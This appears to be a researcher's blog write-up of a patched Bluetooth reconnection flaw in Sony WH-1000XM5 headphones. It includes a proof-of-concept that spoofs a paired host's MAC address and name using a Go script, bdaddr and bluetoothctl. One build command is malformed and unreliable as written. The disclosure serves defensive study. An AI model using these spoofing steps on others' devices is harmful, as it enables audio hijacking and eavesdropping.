Sony WH-1000XM5 Bluetooth Vulnerability: Man-in-the-Middle via Insecure Reconnection

In 2024, a critical Bluetooth vulnerability was responsibly disclosed in Sony’s premium noise-cancelling headphones, the WH-1000XM5. This flaw allows attackers to impersonate a previously paired device and connect without any user interaction. The exploit leverages weaknesses in the device’s Bluetooth reconnection mechanism, making it vulnerable to Man-in-the-Middle (MiTM) attacks, session hijacking, and unauthorized audio access — even when the device is not in pairing mode.

The vulnerability has now been patched in firmware update v2.4.1, but it highlights a broader issue in how Bluetooth reconnection is handled across many premium headsets.

The WH-1000XM5 fails to securely implement Secure Simple Pairing (SSP) during reconnection. Instead of validating re-authentication keys, the device relies only on previously cached Bluetooth MAC addresses and device names to approve a connection.

This means that if an attacker spoofs both the Bluetooth name and address of a previously paired device, the WH-1000XM5 will connect to them automatically, assuming it to be a trusted host — even if no prior pairing has occurred with that specific device.

This is a serious oversight in authentication and deviates from Bluetooth security standards.

To reproduce the vulnerability, you’ll need the following hardware:

Role Device Model Bluetooth Version 🎧 Victim Device Sony WH-1000XM5 Headphones 5.2 💻 Master Device Surface Laptop 4 / Pixel 7 Pro 5.1 or 5.2 🧑‍💻 Attacker Raspberry Pi 4 Model B 5.0 (BlueZ 5.55)

sudo nano /etc/machine-info

Add line:

PRETTY_HOSTNAME=Surface Laptop 4

Restart Bluetooth:

sudo systemctl restart bluetooth

Install Go if not installed:

sudo apt install golang-go

Create a script main.go:

package main
import (
    "flag"
    "os/exec"
)
func main() {
    addr := flag.String("addr", "", "New Bluetooth MAC")
    flag.Parse()
    exec.Command("sudo", "bdaddr", "-i", "hci0", *addr).Run()
}

Compile and run it:

go build main.go -o chgbtaddr
sudo ./chgbtaddr -addr 00:11:22:33:44:55

bluetoothctl
power on
agent on
discoverable on
pairable on

Follow these steps in order:

Pair WH-1000XM5 with the master device (e.g. Surface Laptop 4)
Turn off the master device.
Power off WH-1000XM5 (do not hold button >5s to avoid pairing mode).
Spoof the Raspberry Pi’s Bluetooth MAC and name to match the master device.
Set Raspberry Pi Bluetooth adapter to discoverable and pairable.
Power on WH-1000XM5.

✅ Headphones automatically connect to Raspberry Pi.
❌ No pairing process is required.
⚠️ No user notification or confirmation is shown.

This demonstrates unauthorized access to a secure headset with zero user interaction.

main.go – Go script to spoof Bluetooth MAC address
WH-1000XM5_vuln_poc.pcapng – Packet capture showing unauthorized reconnection

This vulnerability enables:

🎧 Audio Hijacking — Route media/audio through the attacker’s device
🔁 Persistent Reconnection — Device will auto-reconnect even after power cycling
👂 Eavesdropping — Attacker can record or inject fake audio
🎮 Session Takeover — Disrupt legitimate Bluetooth sessions

In corporate or high-security settings, this could lead to serious privacy breaches.

Although this PoC was built around the WH-1000XM5, the researcher noted:

WH-1000XM4 exhibits similar behavior
WF-1000XM5 / XM4 may be affected
At least three other premium brands showed similar flaws

Common factor: All these headsets use high-performance generic Bluetooth chips with vendor-specific firmware layered over them. The vulnerability likely stems from insecure firmware design, not the Bluetooth protocol itself.

This vulnerability is a textbook example of incomplete implementation of Bluetooth SSP reconnection. It allows attackers to spoof trusted devices and bypass authentication, undermining core Bluetooth trust mechanisms.

Thanks to responsible disclosure, Sony patched this issue in v2.4.1, and acknowledged the researcher. However, this case is a wake-up call for manufacturers:

Implement proper SSP validation during every reconnection
Prevent auto-pairing based only on MAC and name
Notify users of any reconnection attempts

The root cause may lie in generic Bluetooth chip stacks, indicating a broader infrastructure problem.

The researcher responsibly disclosed this vulnerability via HackerOne. Despite no direct bounty, they received swag, public acknowledgment, and their findings were presented at ICSS 2025. A true example of community-driven security.

Aditya Sunny
Cybersecurity Enthusiast | Honoured by Bajaj Finance Security Heroes | Secured Meta (FB, IG, WA), Dell, Maffashion & more | Ex-Navodayan | Bug Hunter